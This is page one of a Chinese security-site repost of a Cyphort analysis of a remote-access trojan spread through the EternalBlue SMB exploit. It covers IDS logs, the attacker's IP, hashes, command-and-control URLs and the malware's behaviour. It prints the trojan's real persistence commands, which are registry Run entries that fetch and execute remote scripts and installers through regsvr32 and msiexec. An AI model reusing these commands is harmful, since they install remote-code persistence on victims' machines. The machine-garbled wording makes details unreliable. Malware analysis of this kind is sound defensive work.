欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

研究运用永恒之蓝漏洞破绽感染的RAT

来源:本站整理 作者:佚名 时间:2017-09-12 TAG: 我要投稿

在WannaCry病毒残虐时代,Cyphort实验室曾经挖掘到应用异样的“永恒之蓝”进击包来流传歹意软件。这个恶意软件不是勒索软件也不是以前报导过的比特币挖矿软件。这是一个典型的远控木马,用来监督人们的行动或许节制他们的计算机操纵任何进击者想完成的目标。
5月12号,在WannaCry病毒流传时代,Cyphort实验室的研究员曾经发明了一个针对咱们蜜罐服务器的一个类似的SMB进击。起初,又在5月3号咱们发明了统一进击行动的证据。

收集捕捉到的SMB进击
有异常多的基于如下ET规矩的“永恒之蓝”进击
05/12/2017-17:27:19.766291  [**] [1:2024217:2] ET EXPLOIT PossibleETERNALBLUE MS17-010 Heap Spray [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 182.18.23.38:55768 -> 192.168.160.60:445
05/12/2017-17:27:20.225752  [**] [1:2024217:2] ET EXPLOIT PossibleETERNALBLUE MS17-010 Heap Spray [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 182.18.23.38:55768 -> 192.168.160.60:445
05/12/2017-17:27:20.652098  [**] [1:2024218:1] ET EXPLOIT PossibleETERNALBLUE MS17-010 Echo Response [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.160.60:445 -> 182.18.23.38:55768
05/12/2017-17:27:26.772666  [**] [1:2024218:1] ET EXPLOIT PossibleETERNALBLUE MS17-010 Echo Response [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.160.60:445 -> 182.18.23.38:55768
咱们最后觉得这是WannaCry,然则颠末进一步查询拜访咱们发明这是一个极其秘密的RAT。不像WannaCry,这类威逼只沾染一次而不停止流传,它不是蠕虫。
Payload
从pcap文件中咱们晓得进击者的IP是182.18.23.38.这是一个中国境内的地点。

一旦进击胜利,进击者将发送一个加密的payload作为shellcode。这个shellcode 经由过程异或key“A9 CA 63 BA”加密,而且嵌入了二进制代码如下图所示:

嵌入式DLL的文件属性:
MD5: B6B68FAA706F7740DAFD8941C4C5E35A
SHA1: 806027DB01B4997F71AEFDE8A5DBEE5B8D9DBE98
Time Stamp: Sat Apr 29 09:57:21 2017
Debugging Symbols Path: d:\down10\release\down10.pdb
Exports: DllMain, test, InWMI
这个嵌入式DLL是木马母体,它会下载附加的歹意软件和接收来自节制者的指令。他接收如下情势的指令:
[down]
[cmd]
这些敕令是从 “http://down[.]mysking.info:8888/ok.txt”下载的。

【down】敕令唆使歹意软件从一个链接下载并将它以第二个参数名保留。好比这个他将下载 “http://23.27.127.254:8888/close.bat”,而且保留为 c:\windows\debug\c.bat。
【cmd】敕令前面随着一系列歹意软件将要履行的敕令。

运转以上的敕令,
将会删除如下的用户:
Asps.xnet
IISUSER_ACCOUNTXX
IUSR_ADMIN
snt0454
Asp.net
aspnet
将停止或许删除如下文件或过程。
c:\windows\Logo1_.exe
c:\windows\dell\Update64.exe
Misiai.exe
c:\windows\RichDllt.dll
C:\windows\winhost.exe
C:\windows\ygwmgo.exe
c:\windows\netcore.exe
将经由过程FTP从down.mysking.info下载了一个a.exe文件作为 “Mysa”工作文件。
它会设置到如下的启动项中,为了下载或是履行附加的歹意软件。
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “start1” /d “msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q” /f
而后它会履行c.bat和别的一个DLL文件item.dat:

rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
除此之外它将经由过程拜访http://wmi[.]mykings.top:8888/kill.html 获得要停止的过程清单。

Payload的第二阶段: Item.dat
咱们不克不及从自己的服务器上捕捉到item.dat。  因为【cmd】敕令的感化,这个文件被保留到C:\Windows\debug\item.dat。咱们觉得这是payload的第二阶段。咱们查询拜访了Virustotal上的其余文件,发明他的哈希:

e6fc79a24d40aea81afdc7886a05f008385661a518422b22873d34496c3fb36b

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载